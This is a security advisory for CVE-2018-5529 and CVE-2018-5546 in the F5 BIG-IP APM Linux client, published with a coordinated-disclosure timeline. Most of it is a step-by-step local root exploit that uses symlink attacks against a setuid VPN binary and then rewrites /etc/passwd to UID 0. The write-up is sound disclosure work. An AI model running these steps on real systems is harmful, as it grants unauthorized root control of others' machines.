-
Notifications
You must be signed in to change notification settings - Fork 30
/
CVE-2018-5529.txt
251 lines (179 loc) · 9.24 KB
/
CVE-2018-5529.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
Title: F5 BIG-IP APM client for Linux and macOS vulnerability
Author: Rich Mirch
CVE: CVE-2018-5529 (incomplete fix), CVE-2018-5546
Vendor Advisory: https://support.f5.com/csp/article/K52171282 (CVE-2018-5529)
https://support.f5.com/csp/article/K54431371 (CVE-2018-5546)
Description
The svpn_x86_64 binary included in the F5 Linux CLI Edge Client package
changes the ownership and permissions of several files and directories
under $HOME/.F5Networks which allows local unprivileged users to obtain
ownership of arbitrary files via vectors involving creation of a directory
and a file under that directory, and later replacing that directory or
file with a symlink.
Notes:
1. PoC provided for Linux however macOS is also vulnerable. The svpn binary
is named differently and stored in a different directory on macOS.
2. The policyserver component is also vulnerable to a similar attack against
the $HOME/Library/Logs/F5Networks/policyserver.log file on macOS.
CVSS
Vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C
Base: 7.8
Temporal: 7.0
Test Environment
OS: CentOS 64-bit release 6.9 (latest patches as of 2018-04-12)
Kernel: 2.6.32-696.23.1.el6.x86_64
ISO: apmclients-7160.2018.118.2335-4172.0.iso
Proof Of Concept
Two distinct arbitrary file takeover vulnerabilities exist in the
/usr/local/lib/F5Networks/SSLVPN/svpn_x86_64 binary which is setuid root.
1. Privileges are not dropped prior to chown()/chmod() of the
$HOME/.F5Networks directory.
2. Privileges are not dropped prior to chown()/chmod() of the
$HOME/.F5Networks/svpn.log file.
Note: A low privileged account named user1 is used for all test cases.
[user1@localhost ~]$ id
uid=500(user1) gid=500(user1) groups=500(user1) context=unconfined_u:unconfined_r:unconfined_t:s0-
s0:c0.c1023
################################################################################
# Test case 1 - take ownership of a directory
# /etc via $HOME/.F5Networks
################################################################################
[Step 1] Create a symlink from /etc to $HOME/.F5Networks
[user1@localhost ~]$ ln -s /etc /home/user1/.F5Networks
[user1@localhost ~]$ ls -ld /etc /home/user1/.F5Networks
drwxr-xr-x. 64 root root 4096 Apr 12 19:29 /etc
lrwxrwxrwx. 1 user1 user1 4 Apr 12 19:38 /home/user1/.F5Networks -> /etc
[Step 2] Execute /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
[user1@localhost ~]$ /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
[Step 3] Show that user1 is now the owner of /etc.
[user1@localhost ~]$ ls -ld /etc
drwxr-xr-x. 64 user1 user1 4096 Apr 12 19:39 /etc
[Step 4] Modify /etc/passwd and change UID/GID to 0 for user1.
[user1@localhost ~]$ cd /etc
[user1@localhost etc]$ mv passwd passwd.old
[user1@localhost etc]$ cp passwd.old passwd
[user1@localhost etc]$ ls -ld /etc/passwd
-rw-r--r--. 1 user1 user1 929 Apr 12 19:40 /etc/passwd
[user1@localhost etc]$ sed -i.orig -e 's/:500:500/:0:0/' /etc/passwd
[user1@localhost etc]$ diff -u /etc/passwd.orig /etc/passwd
--- /etc/passwd.orig 2018-04-12 19:40:02.132987696 -0500
+++ /etc/passwd 2018-04-12 19:41:15.484988778 -0500
@@ -18,4 +18,4 @@
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
-user1:x:500:500::/home/user1:/bin/bash
+user1:x:0:0::/home/user1:/bin/bash
[Step 5] Execute /bin/su - user1 and become root.
[user1@localhost etc]$ /bin/su - user1
Password:
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
################################################################################
# Test case 2 - take ownership of a file
# /etc/passwd via $HOME/.F5Networks/svpn.log
################################################################################
[Step 1] Create $HOME/.F5Networks.
[user1@localhost ~]$ mkdir -m 755 /home/user1/.F5Networks
[Step 2] Display permissions of /etc/passwd and attempt to write to it.
[user1@localhost ~]$ ls -ld /etc /etc/passwd
drwxr-xr-x. 64 root root 4096 Apr 12 19:41 /etc
-rw-r--r--. 1 root root 929 Apr 12 19:40 /etc/passwd
[user1@localhost ~]$ echo test> /etc/passwd
-bash: /etc/passwd: Permission denied
[user1@localhost ~]$
[Step 3] Create a symlink from /etc/passwd to /home/user1/.F5Networks/svpn.log.
[user1@localhost ~]$ ln -s /etc/passwd /home/user1/.F5Networks/svpn.log
[user1@localhost ~]$ ls -ld .F5Networks/svpn.log /etc/passwd
-rw-r--r--. 1 root root 929 Apr 12 19:40 /etc/passwd
lrwxrwxrwx. 1 user1 user1 11 Apr 12 22:02 .F5Networks/svpn.log -> /etc/passwd
[Step 4] Backup /etc/passwd.
[user1@localhost ~]$ cp -p /etc/passwd passwd.orig
[Step 5] Display contents of /etc/passwd.
[user1@localhost ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
user1:x:500:500::/home/user1:/bin/bash
[Step 6] Execute /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64. user1 is
now the owner of /etc/passwd.
[user1@localhost ~]$ /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
[user1@localhost ~]$ ls -ld /etc/passwd
-rw-r--r--. 1 user1 user1 2385 Apr 12 22:14 /etc/passwd
[Step 7] Display contents of /etc/passwd. Notice the log file is appended to the file.
[user1@localhost ~]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
user1:x:500:500::/home/user1:/bin/bash
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, =====================================
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Location: /usr/local/lib/F5Networks/SSLVPN/svpn_x86_64
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Version: "7160.2018.0118.1"
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, Locale: C
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,, =====================================
2018-04-12,22:14:15:121, 2479,2479,svpn, 0,,,,
2018-04-12,22:14:15:121, 2479,2479,svpn, 48,,,, current log level = 63
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 91, ------------------,
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 92, [main], getuid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 93, [main], getgid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 94, [main], geteuid, 0
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 95, [main], getegid, 500
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 96, [main], HOME, /home/user1
2018-04-12,22:14:15:121, 2479,2479,svpn, 48, , 98, [main], version, 7160.2018.0118.1
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 100, ------------------,
2018-04-12,22:14:15:121, 2479,2479,svpn, 1, , 107, [main], Current sigprocmask: 0xffff8a00
2018-04-12,22:14:17:124, 2479,2479,svpn, 1, , 33, ReadProperties(), reading of initial configuration timed
out
2018-04-12,22:14:17:124, 2479,2479,svpn, 1, , 116, [main], Reading settings property failed
[Step 8] Create a new /etc/passwd file and change UID and GID to 0.
[user1@localhost ~]$ sed -e 's/:500:500/:0:0/' < passwd.orig > /etc/passwd
[Step 9] Execute /bin/su - user1 and become root.
[user1@localhost ~]$ su - user1
Password:
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[root@localhost ~]#
Timeline:
2018-04-16: Reported to vendor
2018-04-18: Vendor confirmed PoC. Sent to F5 PD for further review
2018-04-25: Vendor confirmed vulnerability and requested embargo
2018-07-12: Vendor released fix in 7.1.7 and advisory K52171282. CVE-2018-5529
2018-07-17: Notified vendor that the fix in 7.1.7 did not properly resolve the issue
2018-07-17: Vendor acknowledged receipt of the incomplete fix report
2018-07-17: Vendor confirmed vulnerability
2018-08-16: Vendor released fix in 7.1.7.1 and advisory K54431371. CVE-2018-5546